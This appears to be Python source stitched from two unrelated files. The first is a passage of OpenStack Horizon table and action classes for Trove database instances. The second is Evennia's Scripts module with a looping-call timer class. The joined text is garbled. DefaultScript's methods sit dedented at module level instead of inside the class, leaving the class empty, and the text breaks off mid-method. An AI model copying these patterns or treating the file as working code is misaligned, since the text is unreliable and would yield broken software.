    classes = ('btn-danger', 'btn-reboot')
    help_text = _("Restarted instances will lose any data not"
                  " saved in persistent storage.")

    @staticmethod
    def action_present(count):
        return ungettext_lazy(u"Restart Instance", u"Restart Instances", count)

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Restarted Instance", u"Restarted Instances", count)

    def allowed(self, request, instance=None):
        # A restart makes sense for running instances as well as ones
        # that are shut down or flagged as needing a restart.
        return (instance.status in ACTIVE_STATES
                or instance.status in ('SHUTDOWN', 'RESTART_REQUIRED'))

    def action(self, request, obj_id):
        api.trove.instance_restart(request, obj_id)
class DetachReplica(tables.BatchAction):
    """Batch action detaching a replica from its replication source."""

    name = "detach_replica"
    classes = ('btn-danger', 'btn-detach-replica')

    @staticmethod
    def action_present(count):
        return ungettext_lazy(u"Detach Replica", u"Detach Replicas", count)

    @staticmethod
    def action_past(count):
        return ungettext_lazy(u"Replica Detached", u"Replicas Detached", count)

    def allowed(self, request, instance=None):
        # Only active instances that actually are replicas can be detached.
        is_replica = hasattr(instance, 'replica_of')
        return is_replica and instance.status in ACTIVE_STATES

    def action(self, request, obj_id):
        api.trove.instance_detach_replica(request, obj_id)
class PromoteToReplicaSource(tables.LinkAction):
    """Row action opening the promote-to-replica-source modal."""

    name = "promote_to_replica_source"
    verbose_name = _("Promote to Replica Source")
    url = "horizon:project:databases:promote_to_replica_source"
    classes = ("ajax-modal", "btn-promote-to-replica-source")

    def allowed(self, request, instance=None):
        # Only an active replica can be promoted.
        is_replica = hasattr(instance, 'replica_of')
        return is_replica and instance.status in ACTIVE_STATES

    def get_link_url(self, datum):
        return urlresolvers.reverse(
            self.url, args=[self.table.get_object_id(datum)])
class EjectReplicaSource(tables.BatchAction):
    """Batch action ejecting the replica source from a replica set."""

    name = "eject_replica_source"
    classes = ('btn-danger', 'btn-eject-replica-source')

    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Eject Replica Source",
            u"Eject Replica Sources",
            count
        )

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Ejected Replica Source",
            u"Ejected Replica Sources",
            count
        )

    def allowed(self, request, instance=None):
        # BUG FIX: this hook was previously named ``_allowed``, which
        # overrides the base Action._allowed() wrapper and thereby skips
        # horizon's policy checks; subclasses are meant to override the
        # public ``allowed`` hook instead.
        return hasattr(instance, 'replicas')

    def action(self, request, obj_id):
        api.trove.eject_replica_source(request, obj_id)
class GrantAccess(tables.BatchAction):
    """Grant a user access to a database on the instance."""

    name = "grant_access"
    # BUG FIX: was ``('btn-grant-access')`` -- parentheses without a comma
    # make a plain string, and iterating it yields one CSS "class" per
    # character. A one-element tuple is required.
    classes = ('btn-grant-access',)

    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Grant Access",
            u"Grant Access",
            count
        )

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Granted Access",
            u"Granted Access",
            count
        )

    def allowed(self, request, instance=None):
        # Only offer the action for databases the user cannot access yet.
        if instance and instance.access:
            return False
        return True

    def action(self, request, obj_id):
        # obj_id is the database name; instance/user come from the table.
        instance_id = self.table.kwargs['instance_id']
        user_name = self.table.kwargs['user_name']
        api.trove.user_grant_access(
            request, instance_id, user_name, [obj_id], None)
class RevokeAccess(tables.BatchAction):
    """Revoke a user's access to a database on the instance."""

    name = "revoke_access"
    # BUG FIX: was ``('btn-revoke-access')`` -- parentheses without a comma
    # make a plain string, and iterating it yields one CSS "class" per
    # character. A one-element tuple is required.
    classes = ('btn-revoke-access',)

    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Revoke Access",
            u"Revoke Access",
            count
        )

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Access Revoked",
            u"Access Revoked",
            count
        )

    def allowed(self, request, instance=None):
        # Only offer the action for databases the user can currently access.
        if instance and not instance.access:
            return False
        return True

    def action(self, request, obj_id):
        # obj_id is the database name; instance/user come from the table.
        instance_id = self.table.kwargs['instance_id']
        user_name = self.table.kwargs['user_name']
        api.trove.user_revoke_access(
            request, instance_id, user_name, obj_id, None)
class AccessTable(tables.DataTable):
    """Table of databases on an instance and a user's access to them."""

    # Name of the database on the instance.
    dbname = tables.Column("name", verbose_name=_("Name"))
    # Whether the selected user currently has access to the database.
    access = tables.Column("access", verbose_name=_("Access"))

    class Meta(object):
        name = "access"
        verbose_name = _("Database Access")
        row_actions = (GrantAccess, RevokeAccess)

    def get_object_id(self, datum):
        # Database names are unique per instance, so the name doubles
        # as the row id.
        return datum.name
class ManageAccess(tables.LinkAction):
    """Row action linking to the per-user database access page."""

    name = "manage_access"
    verbose_name = _("Manage Access")
    url = "horizon:project:databases:access_detail"
    icon = "pencil"

    def get_link_url(self, datum):
        return urlresolvers.reverse(
            self.url, args=[datum.instance.id, datum.name])
class CreateUser(tables.LinkAction):
    """Table action opening the create-user modal."""

    name = "create_user"
    verbose_name = _("Create User")
    url = "horizon:project:databases:create_user"
    classes = ("ajax-modal",)
    icon = "plus"

    def allowed(self, request, instance=None):
        # Use the instance this table belongs to, not the row datum.
        instance = self.table.kwargs['instance']
        return instance.status in ACTIVE_STATES

    def get_link_url(self, datum=None):
        return urlresolvers.reverse(
            self.url, args=[self.table.kwargs['instance_id']])
class EditUser(tables.LinkAction):
    """Row action opening the edit-user modal."""

    name = "edit_user"
    verbose_name = _("Edit User")
    url = "horizon:project:databases:edit_user"
    classes = ("ajax-modal",)
    icon = "pencil"

    def allowed(self, request, instance=None):
        # Use the instance this table belongs to, not the row datum.
        instance = self.table.kwargs['instance']
        return instance.status in ACTIVE_STATES

    def get_link_url(self, datum):
        return urlresolvers.reverse(
            self.url, args=[datum.instance.id, datum.name])
class DeleteUser(tables.DeleteAction):
    """Delete one or more database users."""

    @staticmethod
    def action_present(count):
        return ungettext_lazy(u"Delete User", u"Delete Users", count)

    @staticmethod
    def action_past(count):
        return ungettext_lazy(u"Deleted User", u"Deleted Users", count)

    def delete(self, request, obj_id):
        user = self.table.get_object_by_id(obj_id)
        api.trove.user_delete(request, user.instance.id, user.name)
class CreateDatabase(tables.LinkAction):
    """Table action opening the create-database modal."""

    name = "create_database"
    verbose_name = _("Create Database")
    url = "horizon:project:databases:create_database"
    classes = ("ajax-modal",)
    icon = "plus"

    def allowed(self, request, instance=None):
        # Use the instance this table belongs to, not the row datum.
        instance = self.table.kwargs['instance']
        return (instance.status in ACTIVE_STATES and
                request.user.has_perm('openstack.services.object-store'))

    def get_link_url(self, datum=None):
        return urlresolvers.reverse(
            self.url, args=[self.table.kwargs['instance_id']])
class DeleteDatabase(tables.DeleteAction):
    """Delete one or more databases from the instance."""

    @staticmethod
    def action_present(count):
        return ungettext_lazy(u"Delete Database", u"Delete Databases", count)

    @staticmethod
    def action_past(count):
        return ungettext_lazy(u"Deleted Database", u"Deleted Databases", count)

    def delete(self, request, obj_id):
        database = self.table.get_object_by_id(obj_id)
        try:
            api.trove.database_delete(
                request, database.instance.id, database.name)
        except Exception:
            exceptions.handle(
                request, _('Error deleting database on instance.'))
class LaunchLink(tables.LinkAction):
    """Table-level action linking to the launch-instance workflow."""
    name = "launch"
    verbose_name = _("Launch Instance")
    url = "horizon:project:databases:launch"
    classes = ("ajax-modal", "btn-launch")
    icon = "cloud-upload"
class CreateBackup(tables.LinkAction):
    """Row action linking to the backup-creation workflow."""

    name = "backup"
    verbose_name = _("Create Backup")
    url = "horizon:project:database_backups:create"
    classes = ("ajax-modal",)
    icon = "camera"

    def allowed(self, request, instance=None):
        # Backups need a running instance plus object-store access.
        return (instance.status in ACTIVE_STATES and
                request.user.has_perm('openstack.services.object-store'))

    def get_link_url(self, datum):
        # BUG FIX: the parameter was misspelled ``datam``; horizon passes
        # the row datum positionally, so the rename is call-compatible.
        url = urlresolvers.reverse(self.url)
        return url + "?instance=%s" % datum.id
class ResizeVolume(tables.LinkAction):
    """Row action opening the resize-volume modal."""

    name = "resize_volume"
    verbose_name = _("Resize Volume")
    url = "horizon:project:databases:resize_volume"
    classes = ("ajax-modal", "btn-resize")

    def allowed(self, request, instance=None):
        return instance.status in ACTIVE_STATES

    def get_link_url(self, datum):
        return urlresolvers.reverse(
            self.url, args=[self.table.get_object_id(datum)])
class ResizeInstance(tables.LinkAction):
    """Row action opening the resize-instance (flavor change) modal."""

    name = "resize_instance"
    verbose_name = _("Resize Instance")
    url = "horizon:project:databases:resize_instance"
    classes = ("ajax-modal", "btn-resize")

    def allowed(self, request, instance=None):
        # Resizing is possible both for running and shut-off instances.
        return (instance.status in ACTIVE_STATES
                or instance.status == 'SHUTOFF')

    def get_link_url(self, datum):
        return urlresolvers.reverse(
            self.url, args=[self.table.get_object_id(datum)])
class AttachConfiguration(tables.LinkAction):
    """Row action opening the attach-configuration-group modal."""

    name = "attach_configuration"
    verbose_name = _("Attach Configuration Group")
    url = "horizon:project:databases:attach_config"
    classes = ("btn-attach-config", "ajax-modal")

    def allowed(self, request, instance=None):
        # Only active instances without a configuration group qualify.
        has_config = hasattr(instance, 'configuration')
        return instance.status in ACTIVE_STATES and not has_config
class DetachConfiguration(tables.BatchAction):
    """Batch action detaching the configuration group from instances."""

    name = "detach_configuration"
    classes = ('btn-danger', 'btn-detach-config')

    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Detach Configuration Group",
            u"Detach Configuration Groups",
            count
        )

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Detached Configuration Group",
            u"Detached Configuration Groups",
            count
        )

    def allowed(self, request, instance=None):
        # BUG FIX: this hook was previously named ``_allowed``, which
        # overrides the base Action._allowed() wrapper and thereby skips
        # horizon's policy checks; subclasses are meant to override the
        # public ``allowed`` hook instead.
        return (instance.status in ACTIVE_STATES
                and hasattr(instance, 'configuration'))

    def action(self, request, obj_id):
        api.trove.instance_detach_configuration(request, obj_id)
class EnableRootAction(tables.Action):
    """Enable root access on an instance and surface the new password."""
    name = "enable_root_action"
    verbose_name = _("Enable Root")

    def handle(self, table, request, obj_ids):
        try:
            # NOTE(review): obj_ids is forwarded as-is; presumably the API
            # wrapper accepts it as the instance identifier -- confirm
            # against api.trove.root_enable's signature.
            username, password = api.trove.root_enable(request, obj_ids)
            # The manage-root table shows a single row (the instance),
            # so index 0 is the row being updated.
            table.data[0].enabled = True
            table.data[0].password = password
        except Exception:
            messages.error(request, _('There was a problem enabling root.'))
class DisableRootAction(tables.Action):
    """Disable root access on a database instance."""

    name = "disable_root_action"
    verbose_name = _("Disable Root")

    def allowed(self, request, instance):
        # Only offer the action when root has been enabled at some point.
        enabled = api.trove.root_show(request, instance.id)
        return enabled.rootEnabled

    def single(self, table, request, object_id):
        try:
            api.trove.root_disable(request, object_id)
            table.data[0].password = None
            messages.success(request, _("Successfully disabled root access."))
        except Exception as e:
            # BUG FIX: formatting with ``e.message`` raises AttributeError
            # for exceptions lacking that (deprecated, removed in Python 3)
            # attribute, masking the real error; format the exception itself.
            messages.warning(request,
                             _("Cannot disable root access: %s") % e)
class ManageRoot(tables.LinkAction):
    """Row action linking to the manage-root-access page."""

    name = "manage_root_action"
    verbose_name = _("Manage Root Access")
    url = "horizon:project:databases:manage_root"

    def allowed(self, request, instance):
        return instance.status in ACTIVE_STATES

    def get_link_url(self, datum=None):
        return urlresolvers.reverse(
            self.url, args=[self.table.get_object_id(datum)])
class ManageRootTable(tables.DataTable):
    """Single-row table showing root-access state for one instance."""

    name = tables.Column('name', verbose_name=_('Instance Name'))
    # Rendered as "Yes"/"No" via the yesno + capfirst filters.
    enabled = tables.Column('enabled', verbose_name=_('Root Has Been Enabled'),
                            filters=(d_filters.yesno, d_filters.capfirst),
                            help_text=_("Status if root was ever enabled "
                                        "for an instance."))
    # Only populated right after EnableRootAction runs; cleared on disable.
    password = tables.Column('password', verbose_name=_('Password'),
                             help_text=_("Password is only visible "
                                         "immediately after the root is "
                                         "enabled or reset."))

    class Meta(object):
        name = "manage_root"
        verbose_name = _("Manage Root")
        row_actions = (EnableRootAction, DisableRootAction,)
class UpdateRow(tables.Row):
    """Ajax row refresh: re-fetch a single instance for in-place update."""
    ajax = True

    def get_data(self, request, instance_id):
        instance = api.trove.instance_get(request, instance_id)
        try:
            flavor_id = instance.flavor['id']
            instance.full_flavor = api.trove.flavor_get(request, flavor_id)
        except Exception:
            # Best effort: the row still renders without flavor details
            # (get_size() falls back to "Not available").
            pass
        instance.host = get_host(instance)
        return instance
def get_datastore(instance):
    """Return the instance's datastore type, or a fallback label."""
    if not hasattr(instance, "datastore"):
        return _("Not available")
    return instance.datastore["type"]
def get_datastore_version(instance):
    """Return the instance's datastore version, or a fallback label."""
    if not hasattr(instance, "datastore"):
        return _("Not available")
    return instance.datastore["version"]
def get_host(instance):
    """Return the hostname if set, else the first IP, else a fallback."""
    if hasattr(instance, "hostname"):
        return instance.hostname
    ip_list = getattr(instance, "ip", None)
    if ip_list:
        return ip_list[0]
    return _("Not Assigned")
def get_size(instance):
    """Render "<flavor name> | <RAM> RAM" for the instance, or a fallback."""
    if not hasattr(instance, "full_flavor"):
        return _("Not available")
    flavor = instance.full_flavor
    return _("%(name)s | %(RAM)s RAM") % {
        'name': flavor.name,
        'RAM': sizeformat.mb_float_format(flavor.ram),
    }
def get_volume_size(instance):
    """Render the instance's volume size in GB, or a fallback label."""
    if not hasattr(instance, "volume"):
        return _("Not available")
    return sizeformat.diskgbformat(instance.volume.get("size"))
def get_databases(user):
    """Comma-separated, sorted names of databases the user can access."""
    if not hasattr(user, "access"):
        return _("-")
    return ', '.join(sorted(db.name for db in user.access))
class InstancesTable(tables.DataTable):
    """Main table listing the project's Trove database instances."""

    # (status, completeness) pairs. NOTE(review): following the usual
    # horizon status_choices convention, True/False appear on terminal
    # states and None on transient ones that keep the ajax row polling --
    # confirm against horizon.tables.Column documentation.
    STATUS_CHOICES = (
        ("ACTIVE", True),
        ("BLOCKED", True),
        ("BUILD", None),
        ("FAILED", False),
        ("REBOOT", None),
        ("RESIZE", None),
        ("BACKUP", None),
        ("SHUTDOWN", False),
        ("ERROR", False),
        ("RESTART_REQUIRED", None),
    )
    # Translatable labels shown for each raw status value.
    STATUS_DISPLAY_CHOICES = (
        ("ACTIVE", pgettext_lazy("Current status of a Database Instance",
                                 u"Active")),
        ("BLOCKED", pgettext_lazy("Current status of a Database Instance",
                                  u"Blocked")),
        ("BUILD", pgettext_lazy("Current status of a Database Instance",
                                u"Build")),
        ("FAILED", pgettext_lazy("Current status of a Database Instance",
                                 u"Failed")),
        ("REBOOT", pgettext_lazy("Current status of a Database Instance",
                                 u"Reboot")),
        ("RESIZE", pgettext_lazy("Current status of a Database Instance",
                                 u"Resize")),
        ("BACKUP", pgettext_lazy("Current status of a Database Instance",
                                 u"Backup")),
        ("SHUTDOWN", pgettext_lazy("Current status of a Database Instance",
                                   u"Shutdown")),
        ("ERROR", pgettext_lazy("Current status of a Database Instance",
                                u"Error")),
        ("RESTART_REQUIRED",
         pgettext_lazy("Current status of a Database Instance",
                       u"Restart Required")),
    )
    name = tables.Column("name",
                         link="horizon:project:databases:detail",
                         verbose_name=_("Instance Name"))
    datastore = tables.Column(get_datastore,
                              verbose_name=_("Datastore"))
    datastore_version = tables.Column(get_datastore_version,
                                      verbose_name=_("Datastore Version"))
    host = tables.Column(get_host, verbose_name=_("Host"))
    size = tables.Column(get_size,
                         verbose_name=_("Size"),
                         attrs={'data-type': 'size'})
    volume = tables.Column(get_volume_size,
                           verbose_name=_("Volume Size"),
                           attrs={'data-type': 'size'})
    status = tables.Column("status",
                           verbose_name=_("Status"),
                           status=True,
                           status_choices=STATUS_CHOICES,
                           display_choices=STATUS_DISPLAY_CHOICES)

    class Meta(object):
        name = "databases"
        verbose_name = _("Instances")
        # Rows poll via UpdateRow until "status" reaches a terminal state.
        status_columns = ["status"]
        row_class = UpdateRow
        table_actions = (LaunchLink, DeleteInstance)
        row_actions = (CreateBackup,
                       ResizeVolume,
                       ResizeInstance,
                       AttachConfiguration,
                       DetachConfiguration,
                       PromoteToReplicaSource,
                       EjectReplicaSource,
                       ManageRoot,
                       RestartInstance,
                       DetachReplica,
                       DeleteInstance)
class UsersTable(tables.DataTable):
    """Table of database users on a single instance."""

    name = tables.Column("name", verbose_name=_("User Name"))
    host = tables.Column("host", verbose_name=_("Allowed Host"))
    databases = tables.Column(get_databases, verbose_name=_("Databases"))

    class Meta(object):
        name = "users"
        verbose_name = _("Users")
        table_actions = [CreateUser, DeleteUser]
        row_actions = [EditUser, ManageAccess, DeleteUser]

    def get_object_id(self, datum):
        # User names are unique per instance, so the name is the row id.
        return datum.name
class DatabaseTable(tables.DataTable):
    """Table of databases hosted on a single instance."""

    name = tables.Column("name", verbose_name=_("Database Name"))

    class Meta(object):
        name = "databases"
        verbose_name = _("Databases")
        table_actions = [CreateDatabase, DeleteDatabase]
        row_actions = [DeleteDatabase]

    def get_object_id(self, datum):
        # Database names are unique per instance, so the name is the row id.
        return datum.name
def is_incremental(obj):
    """True when *obj* carries a non-None parent_id (incremental backup)."""
    return getattr(obj, 'parent_id', None) is not None
class InstanceBackupsTable(tables.DataTable):
    """Table of backups taken of a single database instance."""

    name = tables.Column("name",
                         link="horizon:project:database_backups:detail",
                         verbose_name=_("Name"))
    created = tables.Column("created", verbose_name=_("Created"),
                            filters=[filters.parse_isotime])
    # Every row shows a "Download" link pointing at the backup file.
    location = tables.Column(lambda obj: _("Download"),
                             link=lambda obj: obj.locationRef,
                             verbose_name=_("Backup File"))
    # Rendered as "Yes"/"No" via the yesno + capfirst filters.
    incremental = tables.Column(is_incremental,
                                verbose_name=_("Incremental"),
                                filters=(d_filters.yesno,
                                         d_filters.capfirst))
    # Status choices are shared with the database-backups panel.
    status = tables.Column(
        "status",
        verbose_name=_("Status"),
        status=True,
        status_choices=backup_tables.STATUS_CHOICES,
        display_choices=backup_tables.STATUS_DISPLAY_CHOICES)

    class Meta(object):
        name = "backups"
        verbose_name = _("Backups")
        status_columns = ["status"]
        row_class = UpdateRow
        table_actions = (backup_tables.LaunchLink, backup_tables.DeleteBackup)
        row_actions = (backup_tables.RestoreLink, backup_tables.DeleteBackup)
class ConfigDefaultsTable(tables.DataTable):
    """Read-only table of default configuration properties."""

    name = tables.Column('name', verbose_name=_('Property'))
    value = tables.Column('value', verbose_name=_('Value'))

    class Meta(object):
        name = 'config_defaults'
        verbose_name = _('Configuration Defaults')

    def get_object_id(self, datum):
        # Property names are unique, so the name doubles as the row id.
        return datum.name
| |
"""
This module defines Scripts, out-of-character entities that can store
data both on themselves and on other objects while also having the
ability to run timers.
"""
from twisted.internet.defer import Deferred, maybeDeferred
from twisted.internet.task import LoopingCall
from django.core.exceptions import ObjectDoesNotExist
from django.utils.translation import ugettext as _
from evennia.typeclasses.models import TypeclassBase
from evennia.scripts.models import ScriptDB
from evennia.scripts.manager import ScriptManager
from evennia.utils import logger
from future.utils import with_metaclass
__all__ = ["DefaultScript", "DoNothing", "Store"]
class ExtendedLoopingCall(LoopingCall):
    """
    LoopingCall that can start at a delay different
    than `self.interval`.
    """
    # Delay (seconds) before the first tick when started with start_delay;
    # nulled by __call__ once the first tick has fired.
    start_delay = None
    # Number of times the callback has fired (incl. forced repeats).
    callcount = 0

    def start(self, interval, now=True, start_delay=None, count_start=0):
        """
        Start running function every interval seconds.

        This overloads the LoopingCall default by offering the
        start_delay keyword and ability to repeat.

        Args:
            interval (int): Repeat interval in seconds.
            now (bool, optional): Whether to start immediately or after
                `start_delay` seconds.
            start_delay (int): The number of seconds before starting.
                If None, wait interval seconds. Only valid if `now` is `False`.
                It is used as a way to start with a variable start time
                after a pause.
            count_start (int): Number of repeats to start at. The count
                goes up every time the system repeats. This is used to
                implement something repeating `N` number of times etc.

        Raises:
            AssertError: if trying to start a task which is already running.
            ValueError: If interval is set to an invalid value < 0.

        Notes:
            As opposed to Twisted's inbuilt count mechanism, this
            system will count also if force_repeat() was called rather
            than just the number of `interval` seconds since the start.
            This allows us to force-step through a limited number of
            steps if we want.
        """
        assert not self.running, ("Tried to start an already running "
                                  "ExtendedLoopingCall.")
        if interval < 0:
            raise ValueError("interval must be >= 0")
        self.running = True
        # This deferred fires when the loop stops (or errors out).
        deferred = self._deferred = Deferred()
        self.starttime = self.clock.seconds()
        self.interval = interval
        self._runAtStart = now
        self.callcount = max(0, count_start)
        self.start_delay = start_delay if start_delay is None else max(0, start_delay)

        if now:
            # run immediately
            self()
        elif start_delay is not None and start_delay >= 0:
            # start after some time: for this to work we need to
            # trick _scheduleFrom by temporarily setting a different
            # self.interval for it to check.
            real_interval, self.interval = self.interval, start_delay
            self._scheduleFrom(self.starttime)
            # re-set the actual interval (this will be picked up
            # next time it runs
            self.interval = real_interval
        else:
            self._scheduleFrom(self.starttime)
        return deferred

    def __call__(self):
        """
        Tick one step. We update callcount (tracks number of calls) as
        well as null start_delay (needed in order to correctly
        estimate next_call_time at all times).
        """
        self.callcount += 1
        if self.start_delay:
            # The delayed first tick has now fired; from here on the loop
            # runs on the plain interval, so reset the bookkeeping.
            self.start_delay = None
            self.starttime = self.clock.seconds()
        LoopingCall.__call__(self)

    def force_repeat(self):
        """
        Force-fire the callback

        Raises:
            AssertionError: When trying to force a task that is not
                running.
        """
        assert self.running, ("Tried to fire an ExtendedLoopingCall "
                              "that was not running.")
        # Cancel the pending scheduled tick and fire immediately; calling
        # self() also schedules the next regular tick.
        self.call.cancel()
        self.call = None
        self.starttime = self.clock.seconds()
        self()

    def next_call_time(self):
        """
        Get the next call time. This also takes the eventual effect
        of start_delay into account.

        Returns:
            next (int or None): The time in seconds until the next call. This
                takes `start_delay` into account. Returns `None` if
                the task is not running.
        """
        if self.running:
            total_runtime = self.clock.seconds() - self.starttime
            interval = self.start_delay or self.interval
            # NOTE(review): the modulo uses self.interval even while
            # `interval` is the start_delay -- confirm this is intended
            # during the initial delay window.
            return interval - (total_runtime % self.interval)
        return None
class ScriptBase(with_metaclass(TypeclassBase, ScriptDB)):
    """
    Base class for scripts. Don't inherit from this, inherit from the
    class `DefaultScript` below instead.
    """
    # Django manager giving database access (ScriptBase.objects.get(...)).
    objects = ScriptManager()
class DefaultScript(ScriptBase):
    """
    This is the base TypeClass for all Scripts. Scripts describe
    events, timers and states in game, they can have a time component
    or describe a state that changes under certain conditions.
    """
def __eq__(self, other):
    """
    Compares two Scripts by their database ids.

    Args:
        other (Script): A script to compare with.
    """
    try:
        return self.dbid == other.dbid
    except Exception:
        # `other` has no dbid (not a Script) - never equal.
        return False
def _start_task(self):
    """
    Start task runner.
    """
    # The runner lives in ndb (non-persistent store): it must be
    # recreated after every server restart.
    self.ndb._task = ExtendedLoopingCall(self._step_task)

    if self.db._paused_time:
        # the script was paused; restarting
        callcount = self.db._paused_callcount or 0
        self.ndb._task.start(self.db_interval,
                             now=False,
                             start_delay=self.db._paused_time,
                             count_start=callcount)
        # Clear the persisted pause state now that we have resumed.
        del self.db._paused_time
        del self.db._paused_repeats
    else:
        # starting script anew
        self.ndb._task.start(self.db_interval,
                             now=not self.db_start_delay)
def _stop_task(self):
    """Halt the looping-call runner if one is currently active."""
    runner = self.ndb._task
    if runner and runner.running:
        runner.stop()
def _step_errback(self, e):
    """
    Callback for runner errors

    Args:
        e (Failure): Twisted failure wrapping the error raised from
            the repeat step.
    """
    cname = self.__class__.__name__
    estring = _("Script %(key)s(#%(dbid)s) of type '%(cname)s': at_repeat() error '%(err)s'.") % \
              {"key": self.key, "dbid": self.dbid, "cname": cname,
               "err": e.getErrorMessage()}
    try:
        # Best effort: notify the object this script is attached to.
        self.db_obj.msg(estring)
    except Exception:
        # we must not crash inside the errback, even if db_obj is None.
        pass
    logger.log_err(estring)
def _step_callback(self):
    """
    Step task runner. No try..except needed due to defer wrap.
    """
    if not self.is_valid():
        self.stop()
        return

    # call hook
    self.at_repeat()

    # check repeats
    callcount = self.ndb._task.callcount
    maxcount = self.db_repeats
    if maxcount > 0 and maxcount <= callcount:
        # A finite-repeat script has exhausted its repeats; stop it
        # (which also deletes the script).
        self.stop()
def _step_task(self):
    """Run one step, routing any failure through _step_errback."""
    try:
        deferred = maybeDeferred(self._step_callback)
        return deferred.addErrback(self._step_errback)
    except Exception:
        # Errors raised while *setting up* the deferred; log them.
        logger.log_trace()
    return None
# Public methods
def time_until_next_repeat(self):
    """
    Get time until the script fires its `at_repeat` hook again.

    Returns:
        next (int or None): Time in seconds until the script runs
            again, or `None` if this is not a timed script.

    Notes:
        This hook is not used in any way by the script's stepping
        system; it's only here for the user to be able to check in
        on their scripts and when they will next be run.
    """
    task = self.ndb._task
    if not task:
        return None
    try:
        return int(round(task.next_call_time()))
    except TypeError:
        # next_call_time() returned None - the task is not running.
        return None
def remaining_repeats(self):
    """
    Get the number of remaining repeats for limited Scripts.

    Returns:
        remaining (int or None): Repeats left before the Script
            stops (never negative). None when there is no running
            task to query.
    """
    runner = self.ndb._task
    if not runner:
        return None
    return max(0, self.db_repeats - runner.callcount)
def start(self, force_restart=False):
    """
    Called every time the script is started (for persistent
    scripts, this is usually once every server start)

    Args:
        force_restart (bool, optional): Normally an already
            started script will not be started again. if
            `force_restart=True`, the script will always restart
            the script, regardless of if it has started before.

    Returns:
        result (int): 0 or 1 depending on if the script successfully
            started or not. Used in counting.
    """
    if self.is_active and not force_restart:
        # script already runs and should not be restarted.
        return 0
    obj = self.obj
    if obj:
        # check so the scripted object is valid and initialized
        try:
            obj.cmdset
        except AttributeError:
            # this means the object is not initialized.
            logger.log_trace()
            self.is_active = False
            return 0
    # try to restart a paused script
    try:
        if self.unpause(manual_unpause=False):
            return 1
    except RuntimeError:
        # manually paused - only an explicit unpause may restart it.
        return 0
    # start the script from scratch
    self.is_active = True
    try:
        self.at_start()
    except Exception:
        # a failing at_start hook must not block the start itself
        logger.log_trace()
    if self.db_interval > 0:
        # only timed scripts need a task runner
        self._start_task()
    return 1
def stop(self, kill=False):
    """
    Called to stop the script from running. This also deletes the
    script.

    Args:
        kill (bool, optional): Stop the script without
            calling any relevant script hooks.

    Returns:
        result (int): 0 if the script failed to stop, 1 otherwise.
            Used in counting.
    """
    if not kill:
        try:
            self.at_stop()
        except Exception:
            # a failing stop hook must not block the actual stop
            logger.log_trace()
    self._stop_task()
    try:
        self.delete()
    except AssertionError:
        # deletion was vetoed or already in progress
        logger.log_trace()
        return 0
    except ObjectDoesNotExist:
        # the script row is already gone
        return 0
    return 1
def pause(self, manual_pause=True):
    """
    This stops a running script and stores its active state.
    It WILL NOT call the `at_stop()` hook.

    Args:
        manual_pause (bool, optional): False when called by the
            server's own reload/reset machinery. A manual pause
            blocks later automatic unpausing (see `unpause`).
    """
    self.db._manual_pause = manual_pause
    if not self.db._paused_time:
        # only allow pause if not already paused
        task = self.ndb._task
        if task:
            # store the countdown so unpause can resume mid-interval
            self.db._paused_time = task.next_call_time()
            self.db._paused_callcount = task.callcount
            self._stop_task()
        self.is_active = False
def unpause(self, manual_unpause=True):
    """
    Restart a paused script. This WILL call the `at_start()` hook.

    Args:
        manual_unpause (bool, optional): This is False if unpause is
            called by the server reload/reset mechanism.

    Returns:
        result (bool): True if unpause was triggered; implicitly
            None (falsy) when the script was not previously paused.

    Raises:
        RuntimeError: If trying to automatically restart this script
            (usually after a reset/reload), but it was manually paused,
            and so should not be auto-unpaused.
    """
    if not manual_unpause and self.db._manual_pause:
        # if this script was paused manually (by a direct call of pause),
        # it cannot be automatically unpaused (e.g. by a @reload)
        raise RuntimeError
    # Ensure that the script is fully unpaused, so that future calls
    # to unpause do not raise a RuntimeError
    self.db._manual_pause = False
    if self.db._paused_time:
        # only unpause if previously paused
        self.is_active = True
        try:
            self.at_start()
        except Exception:
            # a failing start hook must not block the unpause
            logger.log_trace()
        self._start_task()
        return True
def restart(self, interval=None, repeats=None, start_delay=None):
    """
    Restarts an already existing/running Script from the
    beginning, optionally using different settings. This will
    first call the stop hooks, and then the start hooks again.

    Args:
        interval (int, optional): Allows for changing the interval
            of the Script. Given in seconds. if `None`, will use the
            already stored interval.
        repeats (int, optional): The number of repeats. If unset, will
            use the previous setting.
        start_delay (bool, optional): If we should wait `interval` seconds
            before starting or not. If `None`, re-use the previous setting.
    """
    try:
        self.at_stop()
    except Exception:
        # a failing stop hook must not abort the restart
        logger.log_trace()
    self._stop_task()
    self.is_active = False
    # remove all pause flags
    del self.db._paused_time
    del self.db._manual_pause
    del self.db._paused_callcount
    # set new flags and start over
    if interval is not None:
        self.interval = interval
    if repeats is not None:
        self.repeats = repeats
    if start_delay is not None:
        self.start_delay = start_delay
    self.start()
def reset_callcount(self, value=0):
    """
    Reset the count of the number of calls done.

    Args:
        value (int, optional): The repeat value to reset to.
            Default is to set it all the way back to 0. Clamped
            to be non-negative.

    Notes:
        This is only useful if repeats != 0.
    """
    runner = self.ndb._task
    if not runner:
        return
    runner.callcount = max(0, int(value))
def force_repeat(self):
    """
    Fire a premature triggering of the script callback. This
    will reset the timer and count down repeats as if the script
    had fired normally.
    """
    runner = self.ndb._task
    if runner:
        runner.force_repeat()
def at_first_save(self, **kwargs):
    """
    This is called after very first time this object is saved.
    Generally, you don't need to overload this, but only the hooks
    called by this method.

    Args:
        **kwargs (dict): Arbitrary, optional arguments for users
            overriding the call (unused by default).
    """
    self.at_script_creation()
    if hasattr(self, "_createdict"):
        # this will only be set if the utils.create_script
        # function was used to create the object. We want
        # the create call's kwargs to override the values
        # set by hooks.
        cdict = self._createdict
        updates = []
        if not cdict.get("key"):
            # no key given - fall back to a dbref-based key
            if not self.db_key:
                self.db_key = "#%i" % self.dbid
                updates.append("db_key")
        elif self.db_key != cdict["key"]:
            self.db_key = cdict["key"]
            updates.append("db_key")
        # only overwrite hook-set values that actually differ
        if cdict.get("interval") and self.interval != cdict["interval"]:
            self.db_interval = cdict["interval"]
            updates.append("db_interval")
